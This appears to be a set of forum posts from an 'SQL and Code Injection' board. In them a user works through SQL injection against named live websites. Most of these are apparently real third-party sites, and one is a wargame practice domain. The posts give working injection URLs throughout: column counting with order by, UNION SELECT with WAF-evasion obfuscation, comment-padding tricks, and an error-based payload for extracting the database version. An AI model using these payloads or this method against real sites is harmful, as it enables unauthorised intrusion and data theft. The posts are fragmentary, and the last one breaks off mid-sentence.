How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack.

iam get the number of column and its 1
http://wargame.balcan-underground.net/vesti.php?id=2+order+%0Aby+1--
my friend really its so hard WAF but iam reach for that
http://wargame.balcan-underground.net/vesti.php?id=-2+UN*ION+SEL*ECT+%0A12D2D
but idont know if its true or not ?!! we need another help
Forum: SQL and Code Injection

iam trying to hack site but iam get strang massege like that
Warning: sqlite_array_query()
what is this kind ?!! sqlite i didint hear about it before and iam trying to see tutorial for it on this forum but ididnt find any thing.
Forum: SQL and Code Injection

https://www.nivatel.com/static.php?id=9+order/**/by+6+--+- is 20 chars
increase the char count to 21 or higher, it blows.
https://www.nivatel.com/static.php?id=9+order/**/+by+6+--+- is 21 char
man look https://www.nivatel.com/static.php?id=9+order/**/by/**/1--+--+
more than 20 chars and iam get right page
and u didint tell me about this site http://www.precisionaerobatics.com/gal
Forum: SQL and Code Injection

https://www.nivatel.com/static.php?id=9
iam tried with this site the command +order+by+1--
and iam get the number of columns is 6 but when iam try to do the command
-9+union+select+1,2,3,4,5,6-- ican get the velnaruble column then iam tried with
error based command or 1 group by concat_ws(0x00, version(),hex(rand(0))) having min(0)-- - and no thing too also to chek if its blind with co
Forum: SQL and Code Injection